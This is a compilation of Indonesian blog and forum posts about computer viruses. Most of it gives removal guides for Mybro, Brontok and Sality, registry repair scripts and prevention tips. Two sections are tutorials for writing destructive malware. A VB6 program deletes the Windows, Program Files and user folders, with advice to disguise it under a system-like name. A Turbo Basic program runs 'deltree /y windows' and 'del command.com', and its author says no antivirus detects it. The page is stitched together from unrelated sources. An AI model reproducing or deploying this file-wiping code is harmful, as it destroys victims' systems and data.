Cara menghapus virus W32/Mybro

Cara menghapus virus W32/Mybro

1. Jika menggunakan windows XP Matikan [System Restore] untuk sementara selama proses pembersihan
2. Sebaiknya lakukan pembersihan melalui “safe mode”
3. Matikan proses dari virus W32/mybro, Anda dapat menggunakan tools pengganti Task manager seperti [Security task manager], tools tersebut dapat didownload di website http://www.neuber.com/taskmanager/ matikan proses berikut [ingat !! cari file yang mempunyai bentuk folder].

o Winlogon

o Services

o Lsass

o Smss

o Csrss

4. Hapus registry yang pernah dibuat oleh W32/Mybro, copy script berikut di notepad kemudian simpan menjadi repair.inf, jalankan file tersebut

o Klik kanan repair.inf

o Klik [install]

[Version]

Signature="$Chicago$"

Provider=Vaksincom



[DefaultInstall]

AddReg=UnhookRegKey

DelReg=del



[UnhookRegKey]

HKLM, Software\CLASSES\batfile\shell\open\command,,,"""% 1"" %*"

HKLM, Software\CLASSES\comfile\shell\open\command,,,"""% 1"" %*"

HKLM, Software\CLASSES\exefile\shell\open\command,,,"""% 1"" %*"

HKLM, Software\CLASSES\piffile\shell\open\command,,,"""% 1"" %*"

HKLM, Software\CLASSES\regfile\shell\open\command,,,"reg edit.exe "%1""

HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""% 1"" %*"

HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"

HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe"

HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, "cmd.exe"



[del]

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \System,DisableRegistryTools

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \System,DisableCMD

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \Explorer,NoFolderOptions

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \System,DisableTaskMgr

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies \Explorer\run

HKCU, Software\Microsoft\Windows\CurrentVersion\Run,Tok-Cirrhatus-3444Admc

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Bron-Spizaetus-2733VIRM

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies \Explorer,ShowSuperHidden

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies \Explorer\run

5. Hapus file Empty.pif pada direktori

o C:\Documents and Settings\suport\Start Menu\Programs\Startup

6. Hapus file yang pernah dibuat oleh virus, sebelumnya pastikan anda telah menampilkan semua file yang disembunyikan, jika folder option belum muncul juga coba restart komputer terlebih dahulu kemudian booting ke mode “safe mode”, setelah itu hapus file berikut:

o

C:\Windows
+

_default17832
+

Cinderawasih-4178327
+

Komodo-6178322
o

C:\Windows\Ad22098
+

Smss.exe
o

C:\Windows\System32\S8787
+

Csrss.exe
+

Lsass.exe
+

Services.exe
+

Winlogon.exe
+

Smss.exe
+

Zh592115084y.exe
+

C.bron.tok.txt, berisi text

Brontok.C

By:Jowobot

+

Spread.mail.bro, berisi alamat email yang telah diperoleh dari komputer yang terinfeksi
+

Spread.sent.Bro, berisi alamat email yang berhasil dikirimkan
o

C:\Documents and Settings\%user%\Local Settings\Application Data
+

Jalak-932115015-bali.com
+

Winlogon.exe [berbentuk notepad]
o

Dv6211500x, berisi file:
+

Yesbron.com
o

C:\Windows\system32
+

C_17832k.com
o

C:\Documents and Settings\suport\Start Menu\Programs\Startup
+

Empty.pif
o

C:\
+

Baca Bro !!!.txt

Anda harus perhatikan juga ukuran file yang terinfeksi tersebut, karena jika file yang terinfeksi [file induk] mempunyai ukuran 51 KB W32/Mybro selain membuat file induk diatas juga akan membuat beberapa file induk tambahan diantaranya:

*

C:\Windows\System32\n8127
o

Csrss.exe
o

Lsass.exe
o

Services.exe
o

Winlogon.exe
o

C.Bron.Tok.txt
o

Spread.mail.bro
o

Spread.sent.bro
o

Sv711917030r.exe
o

Smss.exe
*

C:\Windows\SY20118
o

Smss.exe
7. Hapus file [task scheduled] yang dibuat oleh W32/Mybro
*

Klik [start]
*

Klik [Settings]
*

Klik [control panel]
*

Klik 2 kali menu [Scheduled task]
*

Hapus file AT1 dan AT2
8. Hapus string [daftar website yang diblok] yang dibuat oleh W32/Mybro pada file HOST yang berada dilokasi

C:\Windows\System32\Drivers\ETC

9. Ubah kembali file MSVBVM60.dll.xxx [dimana xxx menunjukan angka] menjadi nama file MSVBVM60.dll pada direktori C:\Windows\system32
10. Coba cari dan hapus file duplikat yang dibuat oleh virus, dengan ciri-ciri

· Ukuran 48 KB atau 51 KB

· Icin yang digunakan berbentuk FOLDER

· Ekstensi file EXE

· Type file “Application”

Catatan:

Dari hasil pengujian virus ini tidak membuat file duplikat pada local disk

11. Untuk pembersihan optimal dan mencegah infeksi ulang, gunakan antivirus yang sudah dapat mengenali virus ini dengan baik. (AJT)

__________________
[url=http://www.blogawards2006.com][img]http://www.geocities.com/avril_gungry/blog.jpg[/img][/url]
[img]http://img6.cdn.adjuggler.com/images/Client286240/1224748912288_20081023160152_forum.gif[/img]

sumber : http://clubbing.kapanlagi.com/showthread.php?s=bf7e61ed0a758355a27f3252f63a9805&t=6330

CARA MEMBUAT VIRUS MEMATIKAN DAN SIMPLE

Yg diperluin:
1. VB(optimal : 6.0)
2. Ngerti tombol2nya VB

Tutorial Bikin Virus cman 1 mnt

1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3.
Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu…

Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja…

4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32″ jadi ga bakal dicurigain

5. Jangan pernah naroh nama lu di nih virus… k?

6. compile deh… slese!

gampangkan

sumber : http://bangajie.multiply.com/journal/item/19/CARA_MEMBUAT_BUAT_VIRUS_MEMATIKAN_

25 Cara membuat program perusak (Seperti Virus)

Penulis peduli dengan para newbie yang sedang belajar pemograman sekaligus penulis juga
peduli dengan para progammer yang belum mengenal bahasa BASIC (Maklum kebanyakan progammer
pada langsung lompat ke Pascal, C dan lainnya).

Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer,
tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali,
anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara
membuat program perusak ( seperti virus) yang sangat sederhana sekali tapi sangat mematikan
bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.

Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk
berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda
cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda
dapat mendownloadnya di Google atau cari dirental CD.

Jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code
program perusak.

shell "Perintah DOS"

dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda
membuat :

shell "c:"
shell "cd\"
shell "del command.com"

Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna
komputer tidak dapat booting, kita contohkan yang lain.

shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"

Diatas adalah contoh menghapus Directory My Document, Windows dan Program Files, sangat
fatal bukan ?

Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save
lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi,
caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile
lalu anda enter, maka source code tersebut akan menjadi file EXE.

Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada
program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda
dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa BELUM ADA SATU ANTIVIRUS
DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program
ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe

Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan
ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai
jenis Antivirus.

sumber : http://rizalsaputra81.blogspot.com/2009/10/cara-membuat-program-perusak-seperti.html

CARA MEMBUAT VIRUS HANDPHONE DENGAN SMS

Hari ini saya akan menjelaskan kepada anda cara membuat VIRUS untuk handphone/hp, bukan VIRUS TROJAN, WAlLWARE. kenapa VIRUS yang saya buat bukan untuk komputer / PC Melainkan untuk handphone? sebelumnya di tahun 2008 saya sudah pernah menjelaskan tentang cara membuat VIRUS TROJAN pastinya program ini di gunakan untuk merusak sistem di suatu komputer tertentu yang mungkin orangnya tidak anda sukai!
Nah ... Sekarang saya akan membagikan ilmu tentang cara membuat VIRUS untuk Hp, sebelumnya pernahkah anda mendapat SMS ketika anda membuka SMS tersebut dan menekan arah bawah maka handphone anda akan secara otomatis akan mati, namun VIRUS ini tidak berbahaya, silahkan copy code virus ini dan kirim ke handphone anda melalui sistem pengiriman SMS melalui internet, seperti yahoo, dll, sebenarnya di blog saya dulu ada sistem pengiriman pesan melalui internet ke Hp tetapi sudah saya hapus, karena saya tidak ingin program ini di pakai untuk menipu! Silahkan copy code di bawah, ini type SMS yang harus anda kirim, kata-kata yang di atas bisa di ubah, tetapi jangan hapus code dan tanda enternya!
Silahkan copy dari bawah sini!


JANGAN TEKAN ARAH BAWAH, INI BUKAN SMS BIASA











_¯_¯_¯_¯ ¯_¯_¯_¯_¯_¯_¯_¯_¯_ ¯_¯_¯_¯_¯_¯_¯_¯_¯_ ¯_¯_¯_¯_¯_¯_¯_¯_¯_0



Nah ingat, virus ini hanya mematikan handphone teman yang di kirimi anda sms, sebenarnya program ini bisa disebut Virus tetapi saya lebih senang menyebutnya program meNON AKTIFKAN handphone tanpa menekan tombol tunoff pada hp!
Cara mengaktifkan hp kembali, anda hanya perlu mengaktifkanya kembali, tetapi virus ini hanya aktif pada handphone yang tidak memiliki pasilitas HSDP, HSDPA, yang tentunya pada hp yang tidak ada antivirusnya, minimal handphone yang gak ada cameranya,
Nah silahkan mencoba!

sumber : http://rizalsaputra81.blogspot.com/2009/10/cara-membuat-virus-untuk-hp-lewat-sms.html

CARA MEMBUAT VIRUS HANDPHONE

cara membuat virus handphone

semaleman gw surfing dan hasilnya banyak yg tidak memuaskan hati gw gw sudah meminta bantuan mbah google tapi tetap nihil gw surfing diinternet dengan keyword cara membuat virus hndphone tetapi yang gw dapet tidak seperti yang gw harapkan banyak yang mengulas tentang virus kebanyakan virus komputer baik itu untuk membasminya atau untuk membuat virusnya tetapi tidak ada cara membuat virus handphone tapi gw tidak menyerah


kenapa gw mencari cara membuat virus handphone karena pada sore harinya handphone gw nokia 6630 yang biasa gw gunakan untuk koneksi internet dengan telkomsel unlimited itu terkena virus handphone ,virus handphone itu namanya baselo yg baru gw ketahui setelah gw searching dengan bantuan mbah google ,pada awalnya gw tidak percaya dengan virus handphone karena menurut gw mana mungkin handphone dapat terinfeksi oleh virus ternyata gw salah ,handphone bisa terinfeksi oleh virus dan itu gw alami sendiri .
bagaimana HP nokia 6630 gw terkena virus begini awal ceritanya pada sekitar jam 6:30 sore gw sedang asik konek ke internet dengan HP kesayangan gw yang gw jadikan modem dengan media bluetooh sebagai koneksi ke handphonenya selang beberapa saat di layar HP gw ada tulisan "terima file dari cahaya (ya/cancel)" gw bingung ada yg berusaha kirim file ke HP gw melalui bluetooth dengan nama device cahaya dan nama file yg dikirim "love.rm",beberapa kali gw cancel informasi tersebut bodohnya gw entah yang ke beberapa kali tulisan itu timbul
dan gw menekan tombol "ya" dan selanjutnya ada perintah instal dan lagi-lagi gw tekan "ya" setelah itu otomatis instalasi jalan setelah selesai beberapa saat tidak terjadi apa-apa ,lalu tiba-tiba koneksi internet gw terputus gw bingung "apa yg terjadi" ,setelah gw lihat indikator bluetooth di HP gw sepertinya HP gw sedang ada aktivasi "discover device" melalui bluetooth sedangkan gw sendiri bingung padahal gw tidak melakukan apa-apa,gw curiga dengan file yang tadi gw install gw coba konek lagi ke internet dengan koneksi bluetooth lagi2 gw gagal, akhirnya gw putuskan koneksi menggunakan kabel data allhamdulillah koneksi berhasil ,setelah beberapa saat koneksi
mati gw liat ke layar HP gw liat ada indikator pesan yg sedang di kirim dan mengakses jalur koneksi mms,lalu gw ke kotak pesan dan ke kotak keluar ternyata ada pesan yg akan dikirim keluar dengan nama ile berupa angka dengan sembilan digit dengan attacthment file berekstension gambar gw maik curiga klo file yg terinstall tadi adalah virus akhirnya gw hapus koneksi MMS gw dan gw coba konek menggunakan kabel data dan mencari informasi tentang file yg gw terima dan gw install.
ternyata gw sangat terkejut file yg gw terima dan gw install ternyata adalah virus HP yang bernama baselo akhirnya gw surfing untuk mencari cara menghilangkan virus tersebut dan gw temui caranya.
cara untuk menghilangkan virus itu ternyata tidak gampang tapi allhamdulillah setelah gw ikuti langkah-langkahnya virus itu bisa hilang dn gw bisa koneksi ke internet lagi dengan handphone menggunakan telkomsel-flash unlimited lagi dengan konsekuensi yg harus gw terima karena menerima kiriman dan instalasi file yang kagak jelas dari mana konsekuensinya nomor2 yg tersimpan di memory HP dan aplikasi yg terinstal di memory HP hilang semua karena
langkah2 untuk menghilangkan virus baselo dengan mereset setingan HP kita.
Ok kawan-kawan itulah pengalaman gw dengan virus handphone semoga hal ini tidak dialami kalian ,ok sampai disini dulu lanjut ke postingan terbaru lainnya di kesempatan mendatang.

sumber :http://www.belajar-bareng.co.cc/2008/08/cara-membuat-virus-handphone.html

CARA MEMBASMI VIRUS BRONTOK

a. Restart komputer dan masuk dalam mode "safe mode with command prompt", dengan cara menekan tombol [F8] ketika komputer restart, hal ini dimaksudkan agar virus Rontokbro tidak aktif pada posisi "safe mode" dan komputer tidak melakukan restart selama proses pembersihan.

b. Setelah masuk mode "Command Prompt" tekan tombol [CTRL] + [ALT] + [Del] secara bersamaan, kemudian pilih [Task Manager], setelah layar Task Manager muncul, klik menu [File] pilih [New Task (Run..), kemudian ketik [explorer] pada jendela [create new task file] setelah itu klik enter.

c. Kemudian akan muncul layar desktop (layaknya masuk ke mode "safe mode")

d. Aktifkan kembali fungsi registry editor dan hapus string yang dibuat oleh virus, tulis script seperti yang ada pada angka [3], kemudian simpan menjadi nama file "repair.inf", setelah itu jalankan file tersebut dengan cara: klik kanan file [repair.inf] kemudiani pilih [install]

e. Hapus option [Smss], [Empty] dan [Sempalong] pada msconfig ditabulasi [startup)

f. Agar "Folder option" pada windows explorer dapat muncul, restart kembali komputer dan lakukan seperti langkah pada point (a dan b)

g. Setelah komputer masuk ke mode "safe mode" tampilkan semua file yang disembunyikan (lakukan perubahan ini pada "folder option", lihat point [5], selanjutnya ikuti petunjuk pembersihan Rontokbro seperti yang ada pada point (6-9)


3. Tulis script berikut dan simpan di notepade beri nama file repair.inf, jalankan file tersebut (klik kanan [repair.inf] pilih [install]), hal ini dimaksudkan untuk mengaktifkan kembali fungsi registry editor, menampilkan kembali [folder option] serta menghapus string yang telah dibuat oleh virus:

[Version]
Signature="$Chicago$"
Provider=Vaksincom

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0,"Explorer.exe"

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Run,Tok-Cirrhatus
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Bron-Spizaetus

4. Restart komputer dan masuk kembali ke mode "safe mode" jangan ke posisi "normal" karena file induk dari virus ini masih ada (eksplorasi.exe dan sempalong.exe)

5. Tampilkan file yang disembunyikan, lakukan perubahan pada [folder Option]

6. Hapus file yang dibuat oleh Rontokbro
- C:\Windows dengan, nama file eksplorasi.exe (hidden)
- C:\windows\shellnew, dengan nama sempalong.exe(hidden)
- C:\WINDOWS\system32, dengan nama %username"s Setting.scr (hidden)
- C:\Windows\pss, dengan nama file [Empty.pifStartup]
- C:\Documents and Settings\%user%\Local Settings\Application Data dengan nama file:
- Bron.tok-[x]-[y], di mana [X] dan [Y] menunjukan angka
-- Loc.Mail.Bron.Tok
-- Ok-SendMail-Bron-tok
-- csrss.exe
-- inetinfo.exe
-- Kosong.Bron.Tok.txt
-- lsass.exe
-- NetMailTmp.bin
-- services.exe
-- smss.exe
-- Update.3.Bron.Tok.bin
-- winlogon.exe
-- smss.exe

7. Edit kembali file autoexec.bat di direktori C:\ dan hapus baris perintah [pause]

8. Hapus scheduled tasks yang dibuat oleh Rontokbro (klik [Start], [Settings], [Control Panel], kemudian klik 2 kali menu [scheduled tasks].

9. Hapus file yang dibuat oleh virus, untuk lebih cepatnya gunakan fasilitas [search]

- Klik [Start]
- Klik [Search], kemudian klik [For Files or Folders]
- Kemudian pilih [All files or Folders]
- Klik option [What size is it ?]
- Kemudian pilih option [Specify Size (in Kb)]
- Pada kombo Box, pilih [At most] kemdian isi ukuran file dengan angka [43], setelah itu klik [Search]
- Setelah proses pencarian selesai, sortir berdasarkan ukuran (size), kemudian hapus file yang mempunyai ukuran 42 kb, jangan sampai terjadi kesalahan dalam penghapusan file karena ada beberapa file windows yang mempunyai ukuran 42 kb, cari file yang icon folder dengan extension. EXE.

10. Untuk pembersihan lebih cepat sebaiknya Anda gunakan antivirus yang sudah dapat mengenali Rontokbro.N jangan lupa update antiviru yang terinstall, sebagai informasi antivirus Norman dengan up-date terakhir sudah dapat menganali virus ini dengan baik.

sumber : http://www.ketok.com/forum/viewtopic.php?p=58

KOMPUTER RESTART TERUS MENERUS

Bagaimana kita bisa mengetahui bahwa komputer sudah terinfeksi Rontokbro ? Selain melakukan beberapa perubahan pada registri yang mengakibatkan pemblokiran pada akses Registry Editor sehingga anda tidak bisa membuka regedit.exe, Rontokbro juga menyebabkan komputer restart terus menerus. Biang keladinya bukan eksploitasi celah keamanan seperti Sasser, melainkan karena Rontokbro melakukan restart pada komputer setiap kali menemukan aplikasi dengan nama :

..
.@
@.
.ASP
.EXE
.HTM
.JS
.PHP
ADMIN
ADOBE
AHNLAB
ALADDIN
ALERT
ALWIL
ANTIGEN
APACHE
APPLICATION
ARCHIEVE
ASDF
ASSOCIATE
AVAST
AVG
AVIRA
BILLING@
BLACK
BLAH
BLEEP
BUILDER
CANON
CENTER
CILLIN
CISCO
CMD.
CNET
COMMAND
COMMAND PROMPT
CONTOH
CONTROL
CRACK
DARK
DATA
DATABASE
DEMO
DETIK
DEVELOP
DOMAIN
DOWNLOAD
ESAFE
ESAVE
ESCAN
EXAMPLE
FEEDBACK
FIREWALL
FOO@
FUCK
FUJITSU
GATEWAY
GOOGLE
GRISOFT
GROUP
HACK
HAURI
HIDDEN
HP.
IBM.
INFO@
INTEL.
KOMPUTER
LINUX
LOG OFF WINDOWS
LOTUS
MACRO
MALWARE
MASTER
MCAFEE
MICRO
MICROSOFT
MOZILLA
MYSQL
NETSCAPE
NETWORK
NEWS
NOD32
NOKIA
NORMAN
NORTON
NOVELL
NVIDIA
OPERA
OVERTURE
PANDA
PATCH
POSTGRE
PROGRAM
PROLAND
PROMPT
PROTECT
PROXY
RECIPIENT
REGISTRY
RELAY
RESPONSE
ROBOT
SCAN
SCRIPT HOST
SEARCH R
SECURE
SECURITY
SEKUR
SENIOR
SERVER
SERVICE
SHUT DOWN
SIEMENS
SMTP
SOFT
SOME
SOPHOS
SOURCE
SPAM
SPERSKY
SUN.
SUPPORT
SYBARI
SYMANTEC
SYSTEM CONFIGURATION
TEST
TREND
TRUST
UPDATE
UTILITY
VAKSIN
VIRUS
W3.
WINDOWS SECURITY.VBS
WWW
XEROX
XXX
YOUR
ZDNET
ZEND
ZOMBIE

dimana tujuan dari aksi ini adalah jelas untuk memproteksi dirinya supaya tidak mudah dibasmi.

Selain itu Rontokbro juga berusaha menyerang website

israel.gov.il
playboy.com

dengan cara membanjiri dengan ping. Namun dampak dari aktivitas ini hanya akan terasa kalau komputer yang terinfeksi mencapai jumlah yang sangat banyak (e.g. 10.0000 komputer) yang pada kasus tertentu dapat mengakibatkan website yang diserang menjadi lumpuh /down.

sumber : http://www.ketok.com/forum/viewtopic.php?p=58

DETAIL EMAIL YANG MENGANDUNG VIRUS RONTOKBRO(BRONTOK)

Adapun email yang mengandung virus Rontokbro ini memiliki ciri-ciri sebagai berikut :

From: [Dipalsukan]
Subject: kosong
Message:
BRONTOK.A [ By: HVM**-Jowo*** #** Community ]
-- Hentikan kebobrokan di negeri ini --
1. Adili Koruptor, Penyelundup, Tukang Suap, Penjudi, & Bandar NARKOBA
( Send to "NUSAKAMBANGAN")
2. Stop Free Sex, Absorsi, & Prostitusi
3. Stop (pencemaran laut & sungai), pembakaran hutan & perburuan liar.
4. SAY NO TO DRUGS !!!
-- KIAMAT SUDAH DEKAT --
Terinspirasi oleh: Elang Brontok (Spizaetus Cirrhatus) yang hampir punah[ By: HVM**-Jowo*** #** Community--

Attachment:
Kangen.exe

Uniknya, rontokbro akan menghindari pengiriman email ke alamat-alamat dengan domain sebagai berikut :

PLASA
TELKOM
INDO
.CO.ID
.GO.ID
.MIL.ID
.SCH.ID
.NET.ID
.OR.ID
.AC.ID
.WEB.ID
.WAR.NET.ID
ASTAGA
GAUL
BOLEH
EMAILKU
SATU
Apa alasan di balik aksinya ini ? Apakah untuk mengurangi lalulintas email lokal atau pembuatnya merasa cukup "pede" dimana penyebaran lokal diserahkan pada UFD sehingga tidak perlu mengandalkan penyebaran via email karena toh penyebaran via warnet jauh lebih efektif dibandingkan melalui email. Yang jelas Rontokbro yang disebarkan ke domain di luar Indonesia mencatat "prestasi" yang cukup baik (untuk ukuran Indonesia) dan berhasil menyebar kenegara lain. Hebatnya lagi, antivirus top tidak mengenali virus ini dan menurut catatan Vaksincom, versi Rontokbro yang dikenali oleh antivirus hanya versi awal W32/Rontokbro.A@mm dan W32/RontokbroB.@mm saja. Padahal varian Rontokbro yang diterima oleh Vaksincom dan dapat dikenali oleh Norman Virus Control sudah sampai varian ke 7 W32/Rontrokbro.G@mm.

Satu kehebatan lain dari Rontokbro adalah kemampuannya untuk mencari SMTP server guna mengirimkan kopi dirinya dan ia juga menggunakan SMTP engine sendiri untuk mengirimkan dirinya pada semua alamat email yang berhasil dikumpulkannya dari komputer yang terinfeksi.

sumber : http://www.ketok.com/forum/viewtopic.php?p=58

VIRUS BRONTOK

Pengenalan Virus Brontok
1. Virus ini menyamar sebagai sub folder master contoh : Folder Lucu maka virus ini akan menyamar sebagai sub folder Lucu.
2. Bedakan folder dengan virus, Jika itu bener folder maka folder tersebut tidak memiliki size, jika itu virus maka folder tersebut memiliki size, terus ada extention misal : Lucu.exe dan mempunyai size yang sama 42 KB pada setiap folder (virus). Jangan sekali2x meng-compile (Doble klik folder tersebut), jika itu di lakukan maka akan masuk ke register dan membuat sistem kerja windows mengalami gangguan.
3. Ciri komputer yang sudah terkena virus
- Di windows explorer menu Tools -> Folder Options tidak muncul.
- Jika menjalankan file/perintah tertentu seperti "cmd" maka komputer akan Restart sendiri
- Tidak bisa masuk ke regedit atau msconfig

Pencegahan awal jangan sharing Folder dan jangan asal double klik folder.!!
sumber : v3 boleh.com

CARA MEMBASMI VIRUS SALITY

Jika folder-folder di komputer kamu mempunyai ekstensi .exe, .com. .scr kemungkinan besar computer kamu telah terserang virus sality. Untuk membasmi virus sality ini tidak mudah, selain mendupilkasi folder, virus sality juga menyerang file dengan ekstensi .exe.

Hal ini tentunya akan sangat menggangu kinerja komputer karena aplikasi-aplikasi yang sudah terinstal akan bekerja tidak normal. Dan celakanya semua master aplikasi yang ada dalam drive tidak bisa dijalankan termasuk antivirus. Ketika kamu akan melakukan scanning online melalui internet, semua situs penyedia free online scanning antivirus juga tidak dapat diakses. Lantas bagaimana cara menghapus/membasmi virus sality yang merepotkan ini?


Virus Sality akan menyebar dengan cepat melalui jaringan dengan memanfaatkan default share Windows atau share folder yang mempunyai akses full dengan cara menginfeksi file yang mempunyai ekstensi exe/com/scr.

Untuk itu, perusahaan sekuriti Vaksincom menyarankan pengguna komputer untuk menonaktifkan Default Share (C$, D$ .. dst) dan hindari full sharing folder Anda di jaringan.

Berikut cara singkat membersihkan virus W32/Sality.AE yang dikutip dari Vaksincom :
1. Putuskan hubungan komputer yang akan dibersihkan dari jaringan dan internet.

2. Matikan System Restore selama proses pembersihan berlangsung.

3. Matikan Autorun dan Default Share. Silahkan download file berikut kemudian jalankan dengan cara: klik kanan repair.inf lalu install.

http://www.4shared.com/file/82762498/f5dc1edd/repair.html?dirPwdVerified=feea1d94

4. Matikan program aplikasi yang aktif di memori agar proses pembersihan lebih cepat terutama program yang ada dalam daftar startup.

5. Sebaiknya scan dengan menggunakan removal tools dengan terlebih dahulu merubah ekstensi dari removal tools tersebut dengan ekstensi lain [contoh: CMD] agar tidak diinfeksi ulang oleh W32/Sality.AE.

6. Agar komputer yang sudah terinfeksi W32/Sality.AE dapat booting safe mode, silahkan restore registry yang sudah diubah oleh virus.

Silahkan download file berikut kemudian jalankan sesuai OS yang terinfeksi W32/Sality.AE tersebut.

http://www.4shared.com/file/82761423/934fb170/_2__Sality.htmldirPwdVerified=feea1d94

7. Fix registry lain yang diubah oleh virus, silahkan download tools berikut kemudian jalankan file tersebut dengan cara: klik kanan repair.inf lalu install

http://www.4shared.com/file/82874724/f485f1dd/repair.html?dirPwdVerified=3b1f2fa9

8. Restart komputer dan scan ulang dengan menggunakan removal tools untuk memastikan komputer telah bersih dari virus.

9. Untuk pembersihan optimal dan mencegah infeksi ulang sebaiknya install dan scan dengan antivirus yang dapat mendeteksi Sality dengan baik.

sumber : http://atlantisnetwork.blogspot.com/2009/04/cara-membasmi-virus-sality-exe.html

PENANGGULAN

1. Langkah-Langkah untuk Pencegahan

• Gunakan antivirus yang anda percayai dengan update terbaru. Tidak perduli apapun merknya asalkan selalu diupdate, dan auto-protect dinyalakan maka komputer anda terlindungi.
• Selalu scanning semua media penyimpanan eksternal yang akan digunakan, mungkin hal ini agak merepotkan tetapi jika auto-protect antivirus anda bekerja maka prosedur ini dapat dilewatkan.
• Jika anda terhubung langsung ke Internet cobalah untuk mengkombinasikan antivirus anda dengan Firewall, Anti-spamming, dsb.
• Selalu waspada terhadap fle-file yang mencurigakan, contoh : file dengan 2 buah exstension atau file executable yang terlihat mencurigakan.
• Untuk software freeware + shareware, ada baiknya anda mengambilnya dari situs resminya.
• Semampunya hindari membeli barang bajakan, gunakan software-software open source.

2. Langkah-Langkah Apabila telah Terinfeksi

• Deteksi dan tentukan dimanakah kira-kira sumber virus tersebut apakah di disket, jaringan, email dsb.
• Jika anda terhubung ke jaringan maka ada baiknya anda mengisolasi komputer anda dulu (baik dengan melepas kabel atau mendisable sambungan internet dari control panel)
• Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda, dengan cara melihat Gejala yang timbul, misal : pesan, file yang corrupt atau hilang dsb.
• Scan dengan antivirus anda, jika anda terkena saat auto-protect berjalan berarti virus definition di dalam komputer anda tidak memiliki data virus ini, cobalah update secara manual atau mendownload virus definitionnya untuk kemudian anda install. Jika virus tersebut memblok usaha anda untuk mengupdate, maka upayakan untuk menggunakan media lain (komputer) dengan antivirus yang memiliki update terbaru.
• Bersihkan virus tersebut. Setelah anda berhasil mendeteksi dan mengenalinya maka usahakan segera untuk mencari removal atau cara-cara untuk memusnahkannya di situs-situs yang memberikan informasi perkembangan virus tersebut. Hal ini perlu dilakukan apabila antivirus dengan update terbaru anda tidak berhasil memusnahkannya.
• Langkah terburuk. Jika semua hal diatas tidak berhasil adalah memformat ulang komputer anda .

Semoga pembahasan mengenai virus ini dapat memberikan manfaat bagi kita semua. Tulisan ini ditujukan untuk pembelajaran semata sehingga sangat diharapkan kritik dan sarannya. Apabila banyak kekurangan pada tulisan ini harap dimaklumi.

sumber : http://tongkonanku.blogspot.com/2007/11/cara-penyebaran-penangulangan-virus_12.html

